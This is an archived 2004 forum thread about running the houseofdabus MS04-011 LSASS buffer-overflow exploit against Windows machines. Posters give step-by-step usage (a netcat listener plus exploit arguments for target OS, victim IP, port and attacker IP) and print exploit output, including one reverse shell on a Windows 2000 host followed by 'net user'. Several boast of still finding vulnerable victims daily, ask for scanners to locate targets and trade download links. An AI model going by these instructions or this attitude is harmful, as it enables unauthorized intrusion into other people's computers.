Lsass Cmd Line

GovernmentSecurity.org > The Archives > General Network Security

Pages: 1, 2

predator2187

May 1 2004, 09:47 AM

QUOTE (striker13 @ Apr 30 2004, 03:02 PM)

hello all nice exploit but i've a problem with nc i've testing on many ips ... when i run the exploit it's good but not for nc :

QUOTE

C:\lsass>lsass 0 ipifoundwithdsscan 666 myip
MS0411 Lsasrv.dll RPC buffer overflow remote exploit v0.1
--- Coded by .::[ houseofdabus ]::. ---

[*] Target: IP:ipifoundwithdsscan: OS: WinXP Professonal [universal] lsass.exe
[*] Connecting to ipifoundwithdsscan:445 ... OK
[*] Attacking ... OK

then i run nc :
C:\Documents and Settings>strike>cd..

C:\Documents and Settings>..

C:\>nc -l -p 666
and nothing

i'm not in c:\winnt\system32...

if you have a answer it's would be great

sorry for my bad english

and thx in advance

you have to run netcat before you exploiting the target

Qlimax

May 1 2004, 09:56 AM

QUOTE (predator2187 @ May 1 2004, 09:47 AM)

QUOTE (striker13 @ Apr 30 2004, 03:02 PM)

hello all nice exploit but i've a problem with nc i've testing on many ips ... when i run the exploit it's good but not for nc :

QUOTE

i'm not in c:\winnt\system32...

if you have a answer it's would be great

sorry for my bad english

and thx in advance

you have to run netcat before you exploiting the target

run the NetCat like that:
nc -l -vv -p PORT

LKM

May 1 2004, 10:58 AM

FIRST STEP:

Open a cmd.Exe, browse to your netcat dir and type : nc.exe -l -p "the port that will open on your computer"

SECOND STEP:

Open an other cmd.exe, browse to exploit, and then type : "name of the exploit.exe" "0, 1, depending the vic os" "Vic's ip" "the port that you opened seconds before with the nc.exe" "your ip"

If you're able to connect to his port 445 (most of the time, it's ok), then you should get something coming in your first cmd.exe, the one in which you opened a port thanks to nc.exe

I hope this help "a bit" those who aren't used to "reverse" exploit

ghost_c

May 1 2004, 02:26 PM

thnks Macsou i'll test it in my machines...

hakyoo

May 1 2004, 02:28 PM

nthg special happening...same shellcode size 316 and ret value 1726 all the time...
getting no shell.....any more suggestions

Paul

May 1 2004, 03:30 PM

Run your own thread if you have probs, this doesnt match the topic.

o0oKARo0o

May 21 2004, 05:48 PM

This exploit is almost dead, everyone´s patched

DMX2

May 21 2004, 05:58 PM

Still many shells here..

Happy hunting ;-)

arn0ld

May 21 2004, 06:00 PM

@o0oKARo0o
this exploit is alive and kickin'
i'm still getting a few *good* vuln targets every day

TRi

May 22 2004, 11:28 PM

Damn, guys, where are we? In Offtopic?

EXPLOiTED wants to know if there is a commandline scanner for LSASS and I think it wasnt his intention to start another newbielike-"I dont get a shell, shall i reboot my PC to get it to work?"-Thread.
I mean guys, when you want some help, ask your mom but when you want to contribute and help this guy post something here! Else: RTFM!

My two cents...

Ps: Sorry, no dont know a commandline scanner either, and I would like to know too if there is one.

asd10

May 23 2004, 08:47 AM

the link isnt working..can anyone give another one?

thnx in advance,

AsD10

o0oKARo0o

May 26 2004, 08:31 PM

check that site, they have some interesting stuff
http://www.mosbatonline.com/hck/download.htm

jhd

May 26 2004, 10:22 PM

now it s dead

SeNe

May 28 2004, 01:03 AM

god damn, who did the translation at this site...
seems another altavista translate job

EXPLOiTED

Jun 2 2004, 03:27 AM

Can we get back on topic... CMDLiNE SCANNER... i have Dsscan, i have scanned ports 139 445 (METALHEAD), that doesnt help... i dont feel like re-scanning those ranges once again when i find the ones with those ports open... METALHEAD.. anywho... can we get back on topic, just ion case someone reads this and says "OMFG Wtf are these morons babbling about" when they could be like "ooooh cmdline scanner ----> link" and id be happy

yes
MERKiN

METALHEAD :-P

macca

Jun 29 2004, 10:51 AM

ive certianly not found a cmd line scanner anywhere, but im sure there is great need for 1.. ill keep looking,... can only hope!

Chizo

Jul 20 2004, 01:42 PM

Anybody can upload the Rlsasrv Exploit from the first site of this thread for me please! thnx! or mail me: g33k@mail.ru

niko.noname

Aug 3 2004, 09:53 AM

@first use remote a commandline scantool like scan500 or sl.exe to make a simple portscan for port 445, next check the fitting results locally via dsscan.

that's my way.

In the vuln resultz, you may find ~10 Percent which are dropping a shell, depends on installed windows version ;o)

Good luck.

Terminal

Aug 9 2004, 07:48 AM

can anyone upload Rlsasrv.zip ? i have other one doesnt seems to work

SeNSeMaNN

Aug 16 2004, 08:13 AM

whats the problem:

C:\lsass>RLsasrv.exe 0 attackip 666 myip
Create NULL session failed
shellcode size 316
Ret value = 58

o_O

iceman517

Aug 17 2004, 03:36 PM

lsass ist shit all system is patch !!!!!

Antil

Aug 17 2004, 03:51 PM

QUOTE (iceman517 @ Aug 17 2004, 03:36 PM)

lsass ist shit all system is patch !!!!!

you really think so?

-hal-

Sep 4 2004, 12:35 PM

cmd1:

c:\>exploit 0 192.168.0.2 4444 192.168.0.1
MS04011 Lsasrv.dll RPC buffer overflow remote exploit v0.1
--- Coded by .::[ houseofdabus ]::. ---

[*] Target: IP: 192.168.0.2: OS: WinXP Professional [universal] lsass.exe
[*] Connecting to 192.168.0.2:445 ... OK
[*] Attacking ... OK

-------------------------------------------------------------

cmd2:
nc -l -p 4444

-------------------------------------------------------------

Then what? Why in cmd2 nothing happens?
I have firewall turned off.

Terminal

Sep 4 2004, 12:56 PM

Put netcatt to listen on port first and then use the sploit . ALso its possible that machine isnt vulnerable /

marco_maison@hotmail.com

Sep 4 2004, 01:19 PM

first

CODE

C:\WINNT\system32>nc -vv -l -p 21
listening on [any] 21 ...

second

CODE

C:\WINNT\system32>lsasrv 2 10.100.8.103 21 10.200.12.205

MS04011 Lsasrv.dll RPC buffer overflow remote exploit v0.1
--- Coded by .::[ houseofdabus ]::. ---

[*] Target: IP: 10.100.8.103: OS: Win2k Advanced Server [SP4] netrap.dll
[*] Connecting to 10.100.8.103:445 ... OK
[*] Attacking ... OK

third
got backshell

CODE

C:\WINNT\system32>nc -vv -l -p 21
listening on [any] 21 ...
connect to [10.200.12.205] from xxx-xxx.xxx.net [10.100.8.10
0] 1526
Microsoft Windows 2000 [Version 5.00.2195]
© Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>net user
net user

do u have another problem?

-hal-

Sep 4 2004, 01:33 PM

CMD1:

C:\>nc -vv -l -p 21
listening on [any] 21 ...

-----------------------------------------------------------------------

CMD2:

C:\>exploit 2 192.168.0.2 21 192.168.0.1

MS04011 Lsasrv.dll RPC buffer overflow remote exploit v0.1
--- Coded by .::[ houseofdabus ]::. ---

[*] Target: IP: 192.168.0.2: OS: Win2k Advanced Server [SP4] netrap.dll

[*] Connecting to 192.168.0.2:445 ... OK
[*] Attacking ... OK

C:\>

-----------------------------------------------------------------------

CMD3:

C:\>nc -vv -l -p 21
listening on [any] 21 ...

-----------------------------------------------------------------------

Still no response...

IcedOut3E

Sep 5 2004, 04:12 AM

Just gotta keep trying, you'll get one.

I thought I was doing it wrong at first cause I wasn't getting shells, but after a while I got one that worked.

Don't forget about the -t option that will check the OS. Then you can choose accordingly to the OS.

Laters...

IcedOut3E

Sep 5 2004, 04:20 AM

Also this might be of help...

Searching around I find this:

QUOTE

did you learn about routers and MAC addresses? well, if they're running a router no... this needs NETBIOS ports to be opened.. routers don't run netbios.. so unless you can get the port 445 to be passed through on the router for a certain computer (have to know internal IP for specific ones), i really don't think so

This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.